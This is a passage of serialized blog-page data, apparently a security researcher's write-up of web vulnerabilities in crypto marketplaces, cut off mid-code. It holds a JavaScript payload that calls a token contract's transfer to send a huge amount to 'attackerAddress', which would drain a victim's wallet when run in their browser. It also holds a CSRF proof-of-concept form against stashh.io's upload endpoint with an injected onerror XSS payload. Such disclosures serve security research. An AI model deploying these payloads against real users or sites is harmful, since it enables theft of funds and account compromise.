},\n",{"type":27,"tag":207,"props":38999,"children":39000},{"class":209,"line":4290},[39001],{"type":27,"tag":207,"props":39002,"children":39003},{"style":238},[39004],{"type":33,"value":38955},{"type":27,"tag":207,"props":39006,"children":39007},{"class":209,"line":4304},[39008,39012,39017],{"type":27,"tag":207,"props":39009,"children":39010},{"style":220},[39011],{"type":33,"value":38963},{"type":27,"tag":207,"props":39013,"children":39014},{"style":1325},[39015],{"type":33,"value":39016}," '_value'",{"type":27,"tag":207,"props":39018,"children":39019},{"style":238},[39020],{"type":33,"value":1842},{"type":27,"tag":207,"props":39022,"children":39023},{"class":209,"line":5466},[39024,39028,39033],{"type":27,"tag":207,"props":39025,"children":39026},{"style":220},[39027],{"type":33,"value":38980},{"type":27,"tag":207,"props":39029,"children":39030},{"style":1325},[39031],{"type":33,"value":39032}," 'uint256'",{"type":27,"tag":207,"props":39034,"children":39035},{"style":238},[39036],{"type":33,"value":1842},{"type":27,"tag":207,"props":39038,"children":39039},{"class":209,"line":5530},[39040],{"type":27,"tag":207,"props":39041,"children":39042},{"style":238},[39043],{"type":33,"value":38997},{"type":27,"tag":207,"props":39045,"children":39046},{"class":209,"line":7900},[39047],{"type":27,"tag":207,"props":39048,"children":39049},{"style":238},[39050],{"type":33,"value":39051}," ],\n",{"type":27,"tag":207,"props":39053,"children":39054},{"class":209,"line":7909},[39055,39060,39065],{"type":27,"tag":207,"props":39056,"children":39057},{"style":220},[39058],{"type":33,"value":39059}," name:",{"type":27,"tag":207,"props":39061,"children":39062},{"style":1325},[39063],{"type":33,"value":39064}," 'transfer'",{"type":27,"tag":207,"props":39066,"children":39067},{"style":238},[39068],{"type":33,"value":1842},{"type":27,"tag":207,"props":39070,"children":39071},{"class":209,"line":7917},[39072,39077],{"type":27,"tag":207,"props":39073,"children":39074},{"style":220},[39075],{"type":33,"value":39076}," outputs:",{"type":27,"tag":207,"props":39078,"children":39079},{"style":238},[39080],{"type":33,"value":32886},{"type":27,"tag":207,"props":39082,"children":39083},{"class":209,"line":7926},[39084],{"type":27,"tag":207,"props":39085,"children":39086},{"style":238},[39087],{"type":33,"value":38955},{"type":27,"tag":207,"props":39089,"children":39090},{"class":209,"line":7934},[39091,39095,39100],{"type":27,"tag":207,"props":39092,"children":39093},{"style":220},[39094],{"type":33,"value":38963},{"type":27,"tag":207,"props":39096,"children":39097},{"style":1325},[39098],{"type":33,"value":39099}," ''",{"type":27,"tag":207,"props":39101,"children":39102},{"style":238},[39103],{"type":33,"value":1842},{"type":27,"tag":207,"props":39105,"children":39106},{"class":209,"line":7943},[39107,39111,39116],{"type":27,"tag":207,"props":39108,"children":39109},{"style":220},[39110],{"type":33,"value":38980},{"type":27,"tag":207,"props":39112,"children":39113},{"style":1325},[39114],{"type":33,"value":39115}," 'bool'",{"type":27,"tag":207,"props":39117,"children":39118},{"style":238},[39119],{"type":33,"value":1842},{"type":27,"tag":207,"props":39121,"children":39122},{"class":209,"line":7952},[39123],{"type":27,"tag":207,"props":39124,"children":39125},{"style":238},[39126],{"type":33,"value":38997},{"type":27,"tag":207,"props":39128,"children":39129},{"class":209,"line":7961},[39130],{"type":27,"tag":207,"props":39131,"children":39132},{"style":238},[39133],{"type":33,"value":39051},{"type":27,"tag":207,"props":39135,"children":39136},{"class":209,"line":7969},[39137,39142,39147],{"type":27,"tag":207,"props":39138,"children":39139},{"style":220},[39140],{"type":33,"value":39141}," type:",{"type":27,"tag":207,"props":39143,"children":39144},{"style":1325},[39145],{"type":33,"value":39146}," 'function'",{"type":27,"tag":207,"props":39148,"children":39149},{"style":238},[39150],{"type":33,"value":1842},{"type":27,"tag":207,"props":39152,"children":39153},{"class":209,"line":7978},[39154],{"type":27,"tag":207,"props":39155,"children":39156},{"style":238},[39157],{"type":33,"value":32638},{"type":27,"tag":207,"props":39159,"children":39160},{"class":209,"line":7987},[39161],{"type":27,"tag":207,"props":39162,"children":39163},{"style":238},[39164],{"type":33,"value":39165}," ];\n",{"type":27,"tag":207,"props":39167,"children":39168},{"class":209,"line":7996},[39169],{"type":27,"tag":207,"props":39170,"children":39171},{"emptyLinePlaceholder":19},[39172],{"type":33,"value":2062},{"type":27,"tag":207,"props":39174,"children":39175},{"class":209,"line":8005},[39176,39180,39185,39189,39193,39198,39202,39207,39211,39215],{"type":27,"tag":207,"props":39177,"children":39178},{"style":214},[39179],{"type":33,"value":38807},{"type":27,"tag":207,"props":39181,"children":39182},{"style":220},[39183],{"type":33,"value":39184}," web3",{"type":27,"tag":207,"props":39186,"children":39187},{"style":226},[39188],{"type":33,"value":229},{"type":27,"tag":207,"props":39190,"children":39191},{"style":214},[39192],{"type":33,"value":1597},{"type":27,"tag":207,"props":39194,"children":39195},{"style":1335},[39196],{"type":33,"value":39197}," Web3",{"type":27,"tag":207,"props":39199,"children":39200},{"style":238},[39201],{"type":33,"value":1343},{"type":27,"tag":207,"props":39203,"children":39204},{"style":220},[39205],{"type":33,"value":39206},"window",{"type":27,"tag":207,"props":39208,"children":39209},{"style":238},[39210],{"type":33,"value":1041},{"type":27,"tag":207,"props":39212,"children":39213},{"style":220},[39214],{"type":33,"value":38677},{"type":27,"tag":207,"props":39216,"children":39217},{"style":238},[39218],{"type":33,"value":1455},{"type":27,"tag":207,"props":39220,"children":39221},{"class":209,"line":8013},[39222],{"type":27,"tag":207,"props":39223,"children":39224},{"emptyLinePlaceholder":19},[39225],{"type":33,"value":2062},{"type":27,"tag":207,"props":39227,"children":39228},{"class":209,"line":8021},[39229,39233,39238,39242,39246,39250,39254,39259,39263,39268,39272,39277,39281,39286],{"type":27,"tag":207,"props":39230,"children":39231},{"style":214},[39232],{"type":33,"value":38807},{"type":27,"tag":207,"props":39234,"children":39235},{"style":220},[39236],{"type":33,"value":39237}," tokenContract",{"type":27,"tag":207,"props":39239,"children":39240},{"style":226},[39241],{"type":33,"value":229},{"type":27,"tag":207,"props":39243,"children":39244},{"style":214},[39245],{"type":33,"value":1597},{"type":27,"tag":207,"props":39247,"children":39248},{"style":220},[39249],{"type":33,"value":39184},{"type":27,"tag":207,"props":39251,"children":39252},{"style":238},[39253],{"type":33,"value":1041},{"type":27,"tag":207,"props":39255,"children":39256},{"style":220},[39257],{"type":33,"value":39258},"eth",{"type":27,"tag":207,"props":39260,"children":39261},{"style":238},[39262],{"type":33,"value":1041},{"type":27,"tag":207,"props":39264,"children":39265},{"style":1335},[39266],{"type":33,"value":39267},"Contract",{"type":27,"tag":207,"props":39269,"children":39270},{"style":238},[39271],{"type":33,"value":1343},{"type":27,"tag":207,"props":39273,"children":39274},{"style":220},[39275],{"type":33,"value":39276},"tokenAbi",{"type":27,"tag":207,"props":39278,"children":39279},{"style":238},[39280],{"type":33,"value":1123},{"type":27,"tag":207,"props":39282,"children":39283},{"style":220},[39284],{"type":33,"value":39285},"contractAddress",{"type":27,"tag":207,"props":39287,"children":39288},{"style":238},[39289],{"type":33,"value":1455},{"type":27,"tag":207,"props":39291,"children":39292},{"class":209,"line":8029},[39293],{"type":27,"tag":207,"props":39294,"children":39295},{"emptyLinePlaceholder":19},[39296],{"type":33,"value":2062},{"type":27,"tag":207,"props":39298,"children":39299},{"class":209,"line":8037},[39300,39304,39309,39313],{"type":27,"tag":207,"props":39301,"children":39302},{"style":214},[39303],{"type":33,"value":38807},{"type":27,"tag":207,"props":39305,"children":39306},{"style":220},[39307],{"type":33,"value":39308}," transactionObject",{"type":27,"tag":207,"props":39310,"children":39311},{"style":226},[39312],{"type":33,"value":229},{"type":27,"tag":207,"props":39314,"children":39315},{"style":238},[39316],{"type":33,"value":384},{"type":27,"tag":207,"props":39318,"children":39319},{"class":209,"line":8046},[39320,39325,39329],{"type":27,"tag":207,"props":39321,"children":39322},{"style":220},[39323],{"type":33,"value":39324}," from:",{"type":27,"tag":207,"props":39326,"children":39327},{"style":220},[39328],{"type":33,"value":38812},{"type":27,"tag":207,"props":39330,"children":39331},{"style":238},[39332],{"type":33,"value":1842},{"type":27,"tag":207,"props":39334,"children":39335},{"class":209,"line":8055},[39336,39341,39345],{"type":27,"tag":207,"props":39337,"children":39338},{"style":220},[39339],{"type":33,"value":39340}," to:",{"type":27,"tag":207,"props":39342,"children":39343},{"style":220},[39344],{"type":33,"value":38871},{"type":27,"tag":207,"props":39346,"children":39347},{"style":238},[39348],{"type":33,"value":1842},{"type":27,"tag":207,"props":39350,"children":39351},{"class":209,"line":8064},[39352,39357,39361,39365],{"type":27,"tag":207,"props":39353,"children":39354},{"style":220},[39355],{"type":33,"value":39356}," data:",{"type":27,"tag":207,"props":39358,"children":39359},{"style":220},[39360],{"type":33,"value":39237},{"type":27,"tag":207,"props":39362,"children":39363},{"style":238},[39364],{"type":33,"value":1041},{"type":27,"tag":207,"props":39366,"children":39367},{"style":220},[39368],{"type":33,"value":39369},"methods\n",{"type":27,"tag":207,"props":39371,"children":39372},{"class":209,"line":8072},[39373,39378,39383,39387,39392,39396,39401,39405,39410,39414,39419,39423,39428,39432,39437],{"type":27,"tag":207,"props":39374,"children":39375},{"style":238},[39376],{"type":33,"value":39377}," .",{"type":27,"tag":207,"props":39379,"children":39380},{"style":1335},[39381],{"type":33,"value":39382},"transfer",{"type":27,"tag":207,"props":39384,"children":39385},{"style":238},[39386],{"type":33,"value":1343},{"type":27,"tag":207,"props":39388,"children":39389},{"style":220},[39390],{"type":33,"value":39391},"attackerAddress",{"type":27,"tag":207,"props":39393,"children":39394},{"style":238},[39395],{"type":33,"value":1123},{"type":27,"tag":207,"props":39397,"children":39398},{"style":220},[39399],{"type":33,"value":39400},"web3",{"type":27,"tag":207,"props":39402,"children":39403},{"style":238},[39404],{"type":33,"value":1041},{"type":27,"tag":207,"props":39406,"children":39407},{"style":220},[39408],{"type":33,"value":39409},"utils",{"type":27,"tag":207,"props":39411,"children":39412},{"style":238},[39413],{"type":33,"value":1041},{"type":27,"tag":207,"props":39415,"children":39416},{"style":1335},[39417],{"type":33,"value":39418},"toWei",{"type":27,"tag":207,"props":39420,"children":39421},{"style":238},[39422],{"type":33,"value":1343},{"type":27,"tag":207,"props":39424,"children":39425},{"style":1325},[39426],{"type":33,"value":39427},"'100000000'",{"type":27,"tag":207,"props":39429,"children":39430},{"style":238},[39431],{"type":33,"value":1123},{"type":27,"tag":207,"props":39433,"children":39434},{"style":1325},[39435],{"type":33,"value":39436},"'ether'",{"type":27,"tag":207,"props":39438,"children":39439},{"style":238},[39440],{"type":33,"value":26983},{"type":27,"tag":207,"props":39442,"children":39443},{"class":209,"line":8081},[39444,39448,39453],{"type":27,"tag":207,"props":39445,"children":39446},{"style":238},[39447],{"type":33,"value":39377},{"type":27,"tag":207,"props":39449,"children":39450},{"style":1335},[39451],{"type":33,"value":39452},"encodeABI",{"type":27,"tag":207,"props":39454,"children":39455},{"style":238},[39456],{"type":33,"value":10778},{"type":27,"tag":207,"props":39458,"children":39459},{"class":209,"line":8090},[39460],{"type":27,"tag":207,"props":39461,"children":39462},{"style":238},[39463],{"type":33,"value":16200},{"type":27,"tag":207,"props":39465,"children":39466},{"class":209,"line":8098},[39467],{"type":27,"tag":207,"props":39468,"children":39469},{"emptyLinePlaceholder":19},[39470],{"type":33,"value":2062},{"type":27,"tag":207,"props":39472,"children":39473},{"class":209,"line":8107},[39474,39479,39483,39487,39491,39496,39500,39505],{"type":27,"tag":207,"props":39475,"children":39476},{"style":220},[39477],{"type":33,"value":39478}," web3",{"type":27,"tag":207,"props":39480,"children":39481},{"style":238},[39482],{"type":33,"value":1041},{"type":27,"tag":207,"props":39484,"children":39485},{"style":220},[39486],{"type":33,"value":39258},{"type":27,"tag":207,"props":39488,"children":39489},{"style":238},[39490],{"type":33,"value":1041},{"type":27,"tag":207,"props":39492,"children":39493},{"style":1335},[39494],{"type":33,"value":39495},"sendTransaction",{"type":27,"tag":207,"props":39497,"children":39498},{"style":238},[39499],{"type":33,"value":1343},{"type":27,"tag":207,"props":39501,"children":39502},{"style":220},[39503],{"type":33,"value":39504},"transactionObject",{"type":27,"tag":207,"props":39506,"children":39507},{"style":238},[39508],{"type":33,"value":1455},{"type":27,"tag":207,"props":39510,"children":39511},{"class":209,"line":8116},[39512],{"type":27,"tag":207,"props":39513,"children":39514},{"style":238},[39515],{"type":33,"value":39516}," });\n",{"type":27,"tag":207,"props":39518,"children":39519},{"class":209,"line":8125},[39520],{"type":27,"tag":207,"props":39521,"children":39522},{"style":238},[39523],{"type":33,"value":5312},{"type":27,"tag":207,"props":39525,"children":39526},{"class":209,"line":8133},[39527],{"type":27,"tag":207,"props":39528,"children":39529},{"style":238},[39530],{"type":33,"value":451},{"type":27,"tag":207,"props":39532,"children":39533},{"class":209,"line":8142},[39534],{"type":27,"tag":207,"props":39535,"children":39536},{"emptyLinePlaceholder":19},[39537],{"type":33,"value":2062},{"type":27,"tag":207,"props":39539,"children":39540},{"class":209,"line":8151},[39541,39545,39549,39554],{"type":27,"tag":207,"props":39542,"children":39543},{"style":214},[39544],{"type":33,"value":26754},{"type":27,"tag":207,"props":39546,"children":39547},{"style":238},[39548],{"type":33,"value":1343},{"type":27,"tag":207,"props":39550,"children":39551},{"style":1325},[39552],{"type":33,"value":39553},"'https://cdn.jsdelivr.net/gh/ethereum/web3.js@1.0.0-beta.36/dist/web3.min.js'",{"type":27,"tag":207,"props":39555,"children":39556},{"style":238},[39557],{"type":33,"value":1455},{"type":27,"tag":207,"props":39559,"children":39560},{"class":209,"line":8160},[39561,39566,39570,39574,39578,39583],{"type":27,"tag":207,"props":39562,"children":39563},{"style":1335},[39564],{"type":33,"value":39565},"setTimeout",{"type":27,"tag":207,"props":39567,"children":39568},{"style":238},[39569],{"type":33,"value":1343},{"type":27,"tag":207,"props":39571,"children":39572},{"style":220},[39573],{"type":33,"value":38753},{"type":27,"tag":207,"props":39575,"children":39576},{"style":238},[39577],{"type":33,"value":1123},{"type":27,"tag":207,"props":39579,"children":39580},{"style":232},[39581],{"type":33,"value":39582},"1e3",{"type":27,"tag":207,"props":39584,"children":39585},{"style":238},[39586],{"type":33,"value":1455},{"type":27,"tag":36,"props":39588,"children":39589},{},[39590,39595],{"type":27,"tag":12606,"props":39591,"children":39592},{},[39593],{"type":33,"value":39594},"CSRF & XSS",{"type":33,"value":39596},"\nWe continued our investigation of potential XSS vulnerabilities by exploring various sinks, such as common field errors and the handling of file uploads in different marketplaces.",{"type":27,"tag":36,"props":39598,"children":39599},{},[39600,39602,39607],{"type":33,"value":39601},"Our attention was drawn to ",{"type":27,"tag":47,"props":39603,"children":39605},{"href":38542,"rel":39604},[51],[39606],{"type":33,"value":38546},{"type":33,"value":39608},", an online platform that allows users to upload images. During the image uploading process, we noticed that certain parameters were being sent in the request, as shown below:",{"type":27,"tag":36,"props":39610,"children":39611},{},[39612],{"type":27,"tag":126,"props":39613,"children":39615},{"alt":7,"src":39614},"/posts/web2-bug-repellant-instructions/csrf.png",[],{"type":27,"tag":36,"props":39617,"children":39618},{},[39619],{"type":33,"value":39620},"and here there is the code:",{"type":27,"tag":101,"props":39622,"children":39624},{"className":201,"code":39623,"language":200,"meta":7,"style":7},"\u003Chtml>\n \u003Cbody>\n \u003Cscript>history.pushState('', '', '/')\u003C/script>\n \u003Cform id=\"form123\" action=\"https://stashh.io/upload_asset\" method=\"POST\" enctype=\"multipart/form-data\" value=\"asd\">\n \u003Cinput type=\"file\" name=\"data\" id=\"file123\">\n \u003Cinput type=\"hidden\" name=\"config\" value=\"{"address":"secret1k6tng55v0zgufpcx8wa2w33asl82fhx84tn3hq<img/src=x onerror=alert(document.domain)>","to":"profile-assets","type":"icon"}\" />\n \u003Cinput type=\"submit\" value=\"Submit request\" />\n \u003C/form>\n \u003C/body>\n\n \u003Cscript>\n\n (async ()=>{\n const blob = await (await fetch(\"/sapo.png\")).blob()\n\n let f = new File([blob], 'sapo.png', {type: 'image/png'})\n const dataTransfer = new DataTransfer();\n dataTransfer.items.add(f);\n\n file123.files = dataTransfer.files;\n })()\n\n \u003C/script>\n\u003C/html>\n",[39625],{"type":27,"tag":84,"props":39626,"children":39627},{"__ignoreMap":7},[39628,39645,39662,39696,39782,39839,40038,40079,40095,40111,40118,40133,40140,40152,40210,40217,40279,40308,40345,40352,40390,40403,40410,40425],{"type":27,"tag":207,"props":39629,"children":39630},{"class":209,"line":210},[39631,39636,39641],{"type":27,"tag":207,"props":39632,"children":39634},{"style":39633},"--shiki-default:#808080",[39635],{"type":33,"value":9257},{"type":27,"tag":207,"props":39637,"children":39638},{"style":214},[39639],{"type":33,"value":39640},"html",{"type":27,"tag":207,"props":39642,"children":39643},{"style":39633},[39644],{"type":33,"value":13274},{"type":27,"tag":207,"props":39646,"children":39647},{"class":209,"line":244},[39648,39653,39658],{"type":27,"tag":207,"props":39649,"children":39650},{"style":39633},[39651],{"type":33,"value":39652}," \u003C",{"type":27,"tag":207,"props":39654,"children":39655},{"style":214},[39656],{"type":33,"value":39657},"body",{"type":27,"tag":207,"props":39659,"children":39660},{"style":39633},[39661],{"type":33,"value":13274},{"type":27,"tag":207,"props":39663,"children":39664},{"class":209,"line":270},[39665,39669,39674,39678,39683,39688,39692],{"type":27,"tag":207,"props":39666,"children":39667},{"style":39633},[39668],{"type":33,"value":39652},{"type":27,"tag":207,"props":39670,"children":39671},{"style":214},[39672],{"type":33,"value":39673},"script",{"type":27,"tag":207,"props":39675,"children":39676},{"style":39633},[39677],{"type":33,"value":17739},{"type":27,"tag":207,"props":39679,"children":39680},{"style":238},[39681],{"type":33,"value":39682},"history.pushState('', '', '/')",{"type":27,"tag":207,"props":39684,"children":39685},{"style":39633},[39686],{"type":33,"value":39687},"\u003C/",{"type":27,"tag":207,"props":39689,"children":39690},{"style":214},[39691],{"type":33,"value":39673},{"type":27,"tag":207,"props":39693,"children":39694},{"style":39633},[39695],{"type":33,"value":13274},{"type":27,"tag":207,"props":39697,"children":39698},{"class":209,"line":296},[39699,39704,39709,39714,39718,39723,39728,39732,39737,39741,39745,39750,39755,39759,39764,39769,39773,39778],{"type":27,"tag":207,"props":39700,"children":39701},{"style":39633},[39702],{"type":33,"value":39703}," \u003C",{"type":27,"tag":207,"props":39705,"children":39706},{"style":214},[39707],{"type":33,"value":39708},"form",{"type":27,"tag":207,"props":39710,"children":39711},{"style":220},[39712],{"type":33,"value":39713}," id",{"type":27,"tag":207,"props":39715,"children":39716},{"style":226},[39717],{"type":33,"value":10380},{"type":27,"tag":207,"props":39719,"children":39720},{"style":1325},[39721],{"type":33,"value":39722},"\"form123\"",{"type":27,"tag":207,"props":39724,"children":39725},{"style":220},[39726],{"type":33,"value":39727}," action",{"type":27,"tag":207,"props":39729,"children":39730},{"style":226},[39731],{"type":33,"value":10380},{"type":27,"tag":207,"props":39733,"children":39734},{"style":1325},[39735],{"type":33,"value":39736},"\"https://stashh.io/upload_asset\"",{"type":27,"tag":207,"props":39738,"children":39739},{"style":220},[39740],{"type":33,"value":24384},{"type":27,"tag":207,"props":39742,"children":39743},{"style":226},[39744],{"type":33,"value":10380},{"type":27,"tag":207,"props":39746,"children":39747},{"style":1325},[39748],{"type":33,"value":39749},"\"POST\"",{"type":27,"tag":207,"props":39751,"children":39752},{"style":220},[39753],{"type":33,"value":39754}," enctype",{"type":27,"tag":207,"props":39756,"children":39757},{"style":226},[39758],{"type":33,"value":10380},{"type":27,"tag":207,"props":39760,"children":39761},{"style":1325},[39762],{"type":33,"value":39763},"\"multipart/form-data\"",{"type":27,"tag":207,"props":39765,"children":39766},{"style":220},[39767],{"type":33,"value":39768}," value",{"type":27,"tag":207,"props":39770,"children":39771},{"style":226},[39772],{"type":33,"value":10380},{"type":27,"tag":207,"props":39774,"children":39775},{"style":1325},[39776],{"type":33,"value":39777},"\"asd\"",{"type":27,"tag":207,"props":39779,"children":39780},{"style":39633},[39781],{"type":33,"value":13274},{"type":27,"tag":207,"props":39783,"children":39784},{"class":209,"line":445},[39785,39790,39794,39799,39803,39808,39813,39817,39822,39826,39830,39835],{"type":27,"tag":207,"props":39786,"children":39787},{"style":39633},[39788],{"type":33,"value":39789}," \u003C",{"type":27,"tag":207,"props":39791,"children":39792},{"style":214},[39793],{"type":33,"value":15648},{"type":27,"tag":207,"props":39795,"children":39796},{"style":220},[39797],{"type":33,"value":39798}," type",{"type":27,"tag":207,"props":39800,"children":39801},{"style":226},[39802],{"type":33,"value":10380},{"type":27,"tag":207,"props":39804,"children":39805},{"style":1325},[39806],{"type":33,"value":39807},"\"file\"",{"type":27,"tag":207,"props":39809,"children":39810},{"style":220},[39811],{"type":33,"value":39812}," name",{"type":27,"tag":207,"props":39814,"children":39815},{"style":226},[39816],{"type":33,"value":10380},{"type":27,"tag":207,"props":39818,"children":39819},{"style":1325},[39820],{"type":33,"value":39821},"\"data\"",{"type":27,"tag":207,"props":39823,"children":39824},{"style":220},[39825],{"type":33,"value":39713},{"type":27,"tag":207,"props":39827,"children":39828},{"style":226},[39829],{"type":33,"value":10380},{"type":27,"tag":207,"props":39831,"children":39832},{"style":1325},[39833],{"type":33,"value":39834},"\"file123\"",{"type":27,"tag":207,"props":39836,"children":39837},{"style":39633},[39838],{"type":33,"value":13274},{"type":27,"tag":207,"props":39840,"children":39841},{"class":209,"line":867},[39842,39847,39851,39855,39859,39864,39868,39872,39877,39881,39885,39889,39894,39899,39904,39909,39914,39918,39923,39928,39933,39937,39942,39947,39951,39956,39961,39966,39971,39976,39981,39986,39990,39995,40000,40005,40010,40015,40019,40024,40029,40033],{"type":27,"tag":207,"props":39843,"children":39844},{"style":39633},[39845],{"type":33,"value":39846}," \u003C",{"type":27,"tag":207,"props":39848,"children":39849},{"style":214},[39850],{"type":33,"value":15648},{"type":27,"tag":207,"props":39852,"children":39853},{"style":220},[39854],{"type":33,"value":39798},{"type":27,"tag":207,"props":39856,"children":39857},{"style":226},[39858],{"type":33,"value":10380},{"type":27,"tag":207,"props":39860,"children":39861},{"style":1325},[39862],{"type":33,"value":39863},"\"hidden\"",{"type":27,"tag":207,"props":39865,"children":39866},{"style":220},[39867],{"type":33,"value":39812},{"type":27,"tag":207,"props":39869,"children":39870},{"style":226},[39871],{"type":33,"value":10380},{"type":27,"tag":207,"props":39873,"children":39874},{"style":1325},[39875],{"type":33,"value":39876},"\"config\"",{"type":27,"tag":207,"props":39878,"children":39879},{"style":220},[39880],{"type":33,"value":39768},{"type":27,"tag":207,"props":39882,"children":39883},{"style":226},[39884],{"type":33,"value":10380},{"type":27,"tag":207,"props":39886,"children":39887},{"style":1325},[39888],{"type":33,"value":27331},{"type":27,"tag":207,"props":39890,"children":39891},{"style":214},[39892],{"type":33,"value":39893},"{"",{"type":27,"tag":207,"props":39895,"children":39896},{"style":1325},[39897],{"type":33,"value":39898},"address",{"type":27,"tag":207,"props":39900,"children":39901},{"style":214},[39902],{"type":33,"value":39903},"":"",{"type":27,"tag":207,"props":39905,"children":39906},{"style":1325},[39907],{"type":33,"value":39908},"secret1k6tng55v0zgufpcx8wa2w33asl82fhx84tn3hq",{"type":27,"tag":207,"props":39910,"children":39911},{"style":214},[39912],{"type":33,"value":39913},"<",{"type":27,"tag":207,"props":39915,"children":39916},{"style":1325},[39917],{"type":33,"value":126},{"type":27,"tag":207,"props":39919,"children":39920},{"style":214},[39921],{"type":33,"value":39922},"/",{"type":27,"tag":207,"props":39924,"children":39925},{"style":1325},[39926],{"type":33,"value":39927},"src",{"type":27,"tag":207,"props":39929,"children":39930},{"style":214},[39931],{"type":33,"value":39932},"=",{"type":27,"tag":207,"props":39934,"children":39935},{"style":1325},[39936],{"type":33,"value":26546},{"type":27,"tag":207,"props":39938,"children":39939},{"style":214},[39940],{"type":33,"value":39941}," ",{"type":27,"tag":207,"props":39943,"children":39944},{"style":1325},[39945],{"type":33,"value":39946},"onerror",{"type":27,"tag":207,"props":39948,"children":39949},{"style":214},[39950],{"type":33,"value":39932},{"type":27,"tag":207,"props":39952,"children":39953},{"style":1325},[39954],{"type":33,"value":39955},"alert",{"type":27,"tag":207,"props":39957,"children":39958},{"style":214},[39959],{"type":33,"value":39960},"(",{"type":27,"tag":207,"props":39962,"children":39963},{"style":1325},[39964],{"type":33,"value":39965},"document",{"type":27,"tag":207,"props":39967,"children":39968},{"style":214},[39969],{"type":33,"value":39970},".",{"type":27,"tag":207,"props":39972,"children":39973},{"style":1325},[39974],{"type":33,"value":39975},"domain",{"type":27,"tag":207,"props":39977,"children":39978},{"style":214},[39979],{"type":33,"value":39980},")>","",{"type":27,"tag":207,"props":39982,"children":39983},{"style":1325},[39984],{"type":33,"value":39985},"to",{"type":27,"tag":207,"props":39987,"children":39988},{"style":214},[39989],{"type":33,"value":39903},{"type":27,"tag":207,"props":39991,"children":39992},{"style":1325},[39993],{"type":33,"value":39994},"profile",{"type":27,"tag":207,"props":39996,"children":39997},{"style":214},[39998],{"type":33,"value":39999},"-",{"type":27,"tag":207,"props":40001,"children":40002},{"style":1325},[40003],{"type":33,"value":40004},"assets",{"type":27,"tag":207,"props":40006,"children":40007},{"style":214},[40008],{"type":33,"value":40009},"","",{"type":27,"tag":207,"props":40011,"children":40012},{"style":1325},[40013],{"type":33,"value":40014},"type",{"type":27,"tag":207,"props":40016,"children":40017},{"style":214},[40018],{"type":33,"value":39903},{"type":27,"tag":207,"props":40020,"children":40021},{"style":1325},[40022],{"type":33,"value":40023},"icon",{"type":27,"tag":207,"props":40025,"children":40026},{"style":214},[40027],{"type":33,"value":40028},""}",{"type":27,"tag":207,"props":40030,"children":40031},{"style":1325},[40032],{"type":33,"value":27331},{"type":27,"tag":207,"props":40034,"children":40035},{"style":39633},[40036],{"type":33,"value":40037}," />\n",{"type":27,"tag":207,"props":40039,"children":40040},{"class":209,"line":892},[40041,40045,40049,40053,40057,40062,40066,40070,40075],{"type":27,"tag":207,"props":40042,"children":40043},{"style":39633},[40044],{"type":33,"value":39846},{"type":27,"tag":207,"props":40046,"children":40047},{"style":214},[40048],{"type":33,"value":15648},{"type":27,"tag":207,"props":40050,"children":40051},{"style":220},[40052],{"type":33,"value":39798},{"type":27,"tag":207,"props":40054,"children":40055},{"style":226},[40056],{"type":33,"value":10380},{"type":27,"tag":207,"props":40058,"children":40059},{"style":1325},[40060],{"type":33,"value":40061},"\"submit\"",{"type":27,"tag":207,"props":40063,"children":40064},{"style":220},[40065],{"type":33,"value":39768},{"type":27,"tag":207,"props":40067,"children":40068},{"style":226},[40069],{"type":33,"value":10380},{"type":27,"tag":207,"props":40071,"children":40072},{"style":1325},[40073],{"type":33,"value":40074},"\"Submit request\"",{"type":27,"tag":207,"props":40076,"children":40077},{"style":39633},[40078],{"type":33,"value":40037},{"type":27,"tag":207,"props":40080,"children":40081},{"class":209,"line":1475},[40082,40087,40091],{"type":27,"tag":207,"props":40083,"children":40084},{"style":39633},[40085],{"type":33,"value":40086}," \u003C/",{"type":27,"tag":207,"props":40088,"children":40089},{"style":214},[40090],{"type":33,"value":39708},{"type":27,"tag":207,"props":40092,"children":40093},{"style":39633},[40094],{"type":33,"value":13274},{"type":27,"tag":207,"props":40096,"children":40097},{"class":209,"line":2065},[40098,40103,40107],{"type":27,"tag":207,"props":40099,"children":40100},{"style":39633},[40101],{"type":33,"value":40102}," \u003C/",{"type":27,"tag":207,"props":40104,"children":40105},{"style":214},[40106],{"type":33,"value":39657},{"type":27,"tag":207,"props":40108,"children":40109},{"style":39633},[40110],{"type":33,"value":13274},{"type":27,"tag":207,"props":40112,"children":40113},{"class":209,"line":2092},[40114],{"type":27,"tag":207,"props":40115,"children":40116},{"emptyLinePlaceholder":19},[40117],{"type":33,"value":2062},{"type":27,"tag":207,"props":40119,"children":40120},{"class":209,"line":2130},[40121,40125,40129],{"type":27,"tag":207,"props":40122,"children":40123},{"style":39633},[40124],{"type":33,"value":39652},{"type":27,"tag":207,"props":40126,"children":40127},{"style":214},[40128],{"type":33,"value":39673},{"type":27,"tag":207,"props":40130,"children":40131},{"style":39633},[40132],{"type":33,"value":13274},{"type":27,"tag":207,"props":40134,"children":40135},{"class":209,"line":2168},[40136],{"type":27,"tag":207,"props":40137,"children":40138},{"emptyLinePlaceholder":19},[40139],{"type":33,"value":2062},{"type":27,"tag":207,"props":40141,"children":40142},{"class":209,"line":4095},[40143,40148],{"type":27,"tag":207,"props":40144,"children":40145},{"style":238},[40146],{"type":33,"value":40147}," (async ()=>",{"type":27,"tag":207,"props":40149,"children":40150},{"style":214},[40151],{"type":33,"value":18158},{"type":27,"tag":207,"props":40153,"children":40154},{"class":209,"line":4103},[40155,40160,40165,40170,40174,40178,40182,40187,40191,40196,40201,40206],{"type":27,"tag":207,"props":40156,"children":40157},{"style":220},[40158],{"type":33,"value":40159}," const",{"type":27,"tag":207,"props":40161,"children":40162},{"style":220},[40163],{"type":33,"value":40164}," blob",{"type":27,"tag":207,"props":40166,"children":40167},{"style":226},[40168],{"type":33,"value":40169}," = ",{"type":27,"tag":207,"props":40171,"children":40172},{"style":376},[40173],{"type":33,"value":4173},{"type":27,"tag":207,"props":40175,"children":40176},{"style":226},[40177],{"type":33,"value":686},{"type":27,"tag":207,"props":40179,"children":40180},{"style":376},[40181],{"type":33,"value":4173},{"type":27,"tag":207,"props":40183,"children":40184},{"style":1335},[40185],{"type":33,"value":40186}," 